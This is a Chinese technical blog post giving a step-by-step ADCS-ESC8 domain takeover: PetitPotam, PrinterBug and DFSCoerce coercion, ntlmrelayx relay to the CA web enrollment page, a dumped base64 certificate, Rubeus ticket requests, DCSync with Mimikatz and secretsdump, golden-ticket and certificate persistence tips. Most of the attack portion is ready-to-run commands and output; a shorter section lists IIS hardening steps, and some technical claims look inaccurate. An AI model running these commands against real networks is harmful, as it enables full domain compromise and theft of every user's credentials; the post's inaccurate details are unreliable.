当前位置：首页 > article >正文

从NTLM中继到域控接管：ADCS-ESC8漏洞实战解析

article 2026/4/1 20:05:37

1. ADCS-ESC8漏洞概述ADCS-ESC8是Active Directory证书服务(AD CS)中的一个高危漏洞它允许攻击者通过NTLM中继攻击获取域控制器证书。这个漏洞的核心在于ADCS默认配置中的Web证书注册页面仅使用HTTP协议且支持NTLM认证但未启用任何中继攻击防护措施。我在实际渗透测试中发现当企业环境中存在以下条件时这个漏洞就具备了可利用性启用了Web注册功能的证书颁发机构(CA)通常可通过http://CA服务器/certsrv/访问Web端点支持NTLM认证且未强制启用HTTPS或扩展保护(EPA)CA上存在允许客户端认证或域计算机注册的证书模板如默认的Machine或DomainController模板这个漏洞之所以危险是因为它可以将普通的NTLM认证中继直接升级为域控接管。我曾在一次红队评估中从初始立足点到完全控制域环境整个过程只用了不到15分钟其中关键就是利用了ESC8漏洞。2. 漏洞利用环境准备2.1 实验环境搭建为了复现这个漏洞我们需要搭建一个标准的AD CS实验环境。以下是典型的环境配置# 域控服务器 (Windows Server 2019) 主机名: DC01 IP: 192.168.1.10 角色: 域控制器证书服务 # 证书服务器 (Windows Server 2019) IP: 192.168.1.20 角色: 企业根CA Web注册服务 # 攻击机 (Kali Linux) IP: 192.168.1.100 工具: Impacket, PetitPotam, Rubeus在实际测试中我发现Windows Server 2016/2019默认安装ADCS时就会存在这个漏洞。安装ADCS角色时务必勾选证书颁发机构Web注册功能这是漏洞利用的关键组件。2.2 工具准备攻击需要以下工具链Impacket用于NTLM中继(ntlmrelayx.py)PetitPotam强制域控发起认证RubeusKerberos票据操作Certipy证书操作工具可选安装命令示例git clone https://github.com/SecureAuthCorp/impacket.git cd impacket pip install .3. 漏洞利用详细步骤3.1 NTLM中继监听设置首先在攻击机上启动ntlmrelayx监听目标指向CA的Web注册接口python3 ntlmrelayx.py -t http://192.168.1.20/certsrv/certfnsh.asp \ --adcs --template DomainController -smb2support关键参数说明-t: 指定中继目标URL--adcs: 启用ADCS攻击模式--template: 指定要请求的证书模板DomainController最有效-smb2support: 启用SMB2支持我在测试中发现如果环境中有多个可用模板选择DomainController模板成功率最高因为它可以直接用于域控身份模拟。3.2 强制域控认证使用PetitPotam工具强制域控向攻击者发起认证python3 PetitPotam.py 192.168.1.100 192.168.1.10这个步骤的原理是利用MS-EFSRPC协议诱使域控系统服务(以SYSTEM权限运行)向攻击者指定的服务器发起认证请求。实测中即使是最新的Windows Server 2022也会受到此技术影响。3.3 获取域控证书当ntlmrelayx成功中继认证后会输出类似以下信息[*] Authenticating against http://192.168.1.20/certsrv/certfnsh.asp as MYDOMAIN/DC01$ SUCCEED [*] Base64 certificate of MYDOMAIN/DC01$: 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 /ptt这个Base64编码的证书就是我们的战利品将其保存为dc.pfx文件。这里有个小技巧如果证书中包含私钥可以直接用于后续操作如果没有可能需要额外步骤提取私钥。3.4 请求Kerberos票据在已控制的域内主机上使用Rubeus工具请求TGTRubeus.exe asktgt /user:DC01$ /certificate:dc.pfx /dc:192.168.1.10 /ptt参数解释/user: 指定要模拟的计算机账户(域控的机器账户)/certificate: 指定之前获取的证书文件/dc: 指定域控制器/ptt: 将票据注入当前会话执行成功后可以使用klist命令验证票据是否已缓存。在我的测试中这一步有时会遇到KRB-ERROR (62): KDC_ERR_CLIENT_NOT_TRUSTED错误通常是因为Kerberos加密类型不匹配需要在组策略中启用所有加密类型。3.5 执行DCSync攻击有了域控的TGT后就可以使用Mimikatz执行DCSync攻击获取域内所有用户的哈希mimikatz.exe lsadump::dcsync /domain:mydomain.com /all /csv exit或者使用Impacket的secretsdumppython3 secretsdump.py mydomain/DC01\$192.168.1.10 -hashes :ntlmhash -just-dc在实际攻击中我建议优先获取krbtgt账户的哈希因为可以用来创建黄金票据实现持久化访问。4. 攻击链分析与防御建议4.1 攻击流程总结整个攻击链可以概括为通过PetitPotam强制域控向攻击者发起NTLM认证使用ntlmrelayx将认证中继到ADCS的Web注册接口获取域控计算机账户的证书使用证书请求域控的Kerberos票据利用票据执行DCSync获取域内所有用户哈希这个攻击之所以有效是因为ADCS的Web接口默认配置存在三个问题使用HTTP而非HTTPS支持NTLM认证未启用通道绑定(EPA)保护4.2 防御措施基于实战经验我推荐以下防御方案1. 禁用NTLM认证# 在IIS中禁用NTLM认证 Get-WebConfigurationProperty -Filter /system.webServer/security/authentication/windowsAuthentication -Name enabled -PSPath IIS:\Sites\Default\Web\CertSrv | Set-WebConfigurationProperty -Value $false2. 启用HTTPS和EPA# 启用扩展保护 Set-WebConfigurationProperty -Filter /system.webServer/security/authentication/windowsAuthentication -Name extendedProtection.tokenChecking -PSPath IIS:\ -Value Require Set-WebConfigurationProperty -Filter /system.webServer/security/authentication/windowsAuthentication -Name extendedProtection.flags -PSPath IIS:\ -Value Allow3. 限制证书模板权限审查所有证书模板的ACL移除Authenticated Users的Enroll权限仅为必要用户/组授予注册权限4. 网络层面防护限制域控到CA服务器的445端口访问部署网络访问控制(NAC)防止未授权设备接入在一次企业安全评估中我们发现即使启用了HTTPS如果未配置EPA攻击仍然可能成功。因此必须同时实施多项防御措施才能有效缓解此漏洞。5. 高级利用技巧5.1 跨域攻击场景在复杂的多域环境中如果存在双向信任关系攻击者可以中继一个域的域控认证到另一个域的ADCS服务。我曾在一个拥有父子域信任关系的环境中通过中继子域域控的认证到父域的CA服务器成功获取了父域域控的证书。5.2 证书持久化获取的域控证书不仅可以用于DCSync还可以配置为长期持久化手段# 将证书添加到域控的机器账户 CertUtil.exe -f -user -p Password123 -importpfx dc.pfx这样即使更改了域控密码攻击者仍能使用证书进行认证。这种持久化方法比黄金票据更难检测因为不涉及KRBTGT账户的哈希修改。5.3 替代PetitPotam的技术如果PetitPotam被防护措施拦截可以考虑其他强制认证技术打印机漏洞(MS-RPRN)python3 printerbug.py domain/user:passwordtarget.dc attacker.ipDFSCoercepython3 dfscoerce.py -d domain -u user -p password -t target.dc -l attacker.ip这些替代技术在最新版本的Windows上可能受限但在较老系统上仍然有效。

从NTLM中继到域控接管：ADCS-ESC8漏洞实战解析

相关文章：

从NTLM中继到域控接管：ADCS-ESC8漏洞实战解析

DevOps实践：如何让开发、测试、运维不再“打架”？

PyTorch导入报错？手把手教你解决WinError 126找不到fbgemm.dll的问题（附libomp140.dll下载）

ESP8266天气时钟DIY全攻略：从零搭建到个性化定制

APDS9960手势传感器驱动开发与嵌入式实战

Qwen3-VL-30B部署避坑指南：从下载到运行一气呵成

数据库存储有什么作用

从零构建32位MIPS单周期处理器：Logisim实战与24条核心指令实现详解

从CVE-2025-65112到NPM投毒：手把手教你搭建安全的私有包仓库（以PubNet为例）

Spring Boot项目实战：用ShardingSphere-JDBC 5.3.2搞定PostgreSQL分库分表，附完整配置流程

告别重复造轮子：用快马平台高效生成ibbot开发脚手架与核心模块

多层PCB板层叠结构详解：如何选择适合你的设计？

从理论到实践：基于状态观测器的闭环系统设计与MATLAB仿真

从开发到上线：在快马平台部署一个可商用的旗博士口播智能体

SQLite3嵌入式开发实战：从零构建一个轻量级学生管理系统（C语言版）

告别重复造轮子：用快马AI一键生成openclaw项目高效串口调试工具

用Arduino和TCS34725颜色传感器做个桌面小助手：自动识别物体颜色并控制RGB灯带

用Simulink+Carsim复现论文：四轮转向后轮控制5种算法对比（附模型下载）

Windows11状态栏图标失效？手把手教你修复注册表关联（附一键脚本）

暗黑破坏神2重制版智能辅助：自动化流程与效率提升完全指南

2GB内存Linux系统运行Django或Flask项目会不会内存不足？

Unity UGUI实战：手把手教你打造一个可拖拽、可弯曲的UI连线组件（附完整源码）

快手直播推流码获取新方法：个人用户如何绕过限制使用OBS推流

ESXI系统安装全流程详解：从U盘启动到网络配置

STM32CubeMX实战指南：DMA驱动USART高效数据传输

SpringBoot集成TTL实现Feign与线程池的TraceId无缝传递（实战优化版）

GG3M贝叶斯决策数学体系：六大核心领域落地应用与差异化壁垒

GG3M 项目贝叶斯更新与决策数学的具体落地应用

GitHub新手避坑指南：从SSH Key到Personal Token，搞定本地项目上传（含大文件失败解决方案）

PingFangSC字体专业配置与高效应用实践指南